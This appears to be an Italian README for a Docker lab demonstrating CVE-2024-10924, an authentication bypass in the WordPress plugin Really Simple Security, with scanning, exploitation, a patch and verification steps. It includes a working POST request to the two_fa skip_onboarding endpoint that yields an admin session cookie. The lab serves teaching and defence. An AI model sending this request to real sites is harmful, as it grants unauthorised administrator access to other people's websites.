
Laboratorio passo-passo che dimostra il bypass dell'autenticazione CVE-2024-10924 nel plugin Really Simple Security, con exploit Python automatizzato, sfruttamento manuale con Burp Suite, scansione GVM e patch di mitigazione.
PANORAMICA Questo progetto dimostra lo sfruttamento e la mitigazione di CVE-2024-10924, una vulnerabilità critica di bypass dell'autenticazione nel plugin WordPress "Really Simple Security".
STEP 1: CONFIGURAZIONE DELL'AMBIENTE
Avvia l'ambiente WordPress vulnerabile: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d
Verificare che i contenitori siano in esecuzione: docker ps
Accedi a WordPress: http://localhost:1337
Strumenti richiesti:
STEP 2: SCANSIONE DELLA VULNERABILITÀ
Esegui la scansione GVM contro il target:
STEP 3: SFRUTTAMENTO
Metodo A - Exploit Python automatizzato: python exploit.py
Metodo B - Burp Suite manuale:
Intercetta il traffico verso http://localhost:1337
Invia richiesta POST: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json
{"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}
Osserva la risposta con l'intestazione Set-Cookie contenente la sessione amministratore
Risultato atteso:
STEP 4: MITIGAZIONE
Applica la patch per bloccare l'endpoint vulnerabile: .\patch.ps1
Cosa fa:
STEP 5: VERIFICA
Esegui nuovamente l'exploit (Metodo A o B): python exploit.py
Risultato atteso dopo la mitigazione:
NOTE AGGIUNTIVE
Per fermare l'ambiente: docker-compose down
Per visualizzare i log dei contenitori: docker-compose logs -f
Per accedere legittimamente all'amministrazione di WordPress: http://localhost:1337/wp-admin (Controlla docker-compose.yml per le credenziali)